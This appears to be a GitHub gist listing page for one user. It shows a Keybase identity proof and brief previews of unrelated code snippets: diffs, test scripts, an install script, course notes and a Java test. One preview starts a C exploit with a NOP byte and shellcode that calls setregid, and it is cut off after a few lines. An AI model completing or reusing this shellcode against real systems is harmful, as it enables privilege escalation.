I hereby claim:
- I am bountin on github.
- I am bountin (https://keybase.io/bountin) on keybase.
- I have a public key whose fingerprint is 5BB1 5335 2814 8CF6 24BE 93BC 330C 5D2E 29CA 27E4
To claim this, I am signing this object:
| --- builder.py 2011-07-22 12:03:44.000000000 +0200 | |
| +++ builder.py.orig 2011-07-22 12:01:22.000000000 +0200 | |
| @@ -1104,7 +1104,7 @@ | |
| # on OSX Snow Leopard, we can use spotlight for faster searching of log files | |
| results = run.run(['mdfind', | |
| '-onlyin', | |
| - os.path.expanduser('~/Library/Application Support/iPhone Simulator/4.3.2'), | |
| + os.path.expanduser('~/Library/Application Support/iPhone Simulator/%s'%iphone_version), | |
| '-name', | |
| '%s.log'%log_id],True) |
| diff -Narub wp-filebase/ajax.php wp-filebase-updated/ajax.php | |
| --- wp-filebase/ajax.php 1970-01-01 01:00:00.000000000 +0100 | |
| +++ wp-filebase-updated/ajax.php 2011-07-13 10:24:01.000000000 +0200 | |
| @@ -0,0 +1,35 @@ | |
| +<?php | |
| +/** | |
| + * WordPress AJAX Process Execution. | |
| + * | |
| + * @package WordPress | |
| + * @subpackage Administration |
| test: all | |
| gcc -std=c99 test.c asma.o -o test | |
| ./test |
| #!/bin/bash | |
| BIN='./dlv.i386-apple-darwin-iodbc' | |
| OPTS='-N=75 component_tester.dl -filter=UNCOMPUTED_c,UNCOMPUTED_p,UNEXPECTED_c,UNEXPECTED_p,DUPLICATED_c,DUPLICATED_p' | |
| for CLASS in g b s; | |
| do | |
| echo "----- Test class $CLASS ----" | |
| for TEST in $CLASS.test* ; | |
| do |
| #include <stdio.h> // printf | |
| #include <stdlib.h> // malloc | |
| #include <string.h> // strlen strncpy | |
| #include <unistd.h> //execl | |
| char nop = '\220'; | |
| char *shellcode = | |
| // setregid(-1, 201) | |
| "\x29\xc0" // subl %eax, %eax |
| import socket | |
| import ecdsa | |
| import base64 | |
| import sys | |
| from hashlib import sha1 | |
| from ecdsa.util import string_to_number | |
| # Fixing fucking scapy warnings - fuck python | |
| import logging | |
| logging.getLogger("scapy.runtime").setLevel(logging.ERROR) |
I hereby claim:
To claim this, I am signing this object:
| #!/bin/bash | |
| # Copy to puphpet/files/exec-always/ | |
| EXTENSION_CONFIG=`grep pgsql.so /etc/hhvm/php.ini` | |
| PHP_INI="/etc/hhvm/php.ini" | |
| if [ -z "$EXTENSION_CONFIG" ] | |
| then | |
| echo "Installing hhvm-pgsql.so" |
| Algebra und Diskrete Mathematik für Informatik und Wirtschaftsinformatik (VO) & Analysis für Informatik und Wirtschaftsinformatik (VO) | |
| > Mathematik | |
| Statistik (UE) & Datenanalyse (VU) | |
| > Statistik | |
| Wissenschaftliches Arbeiten | |
| > Grundlagen wissenschaftlichen Arbeitens | |
| SEPM & Objektorientierte Modellierung |
| import com.googlecode.zohhak.api.TestWith; | |
| import com.googlecode.zohhak.api.runners.ZohhakRunner; | |
| import org.junit.Test; | |
| import org.junit.runner.RunWith; | |
| import static org.assertj.core.api.Assertions.*; | |
| @RunWith(ZohhakRunner.class) | |
| public class FooTest { |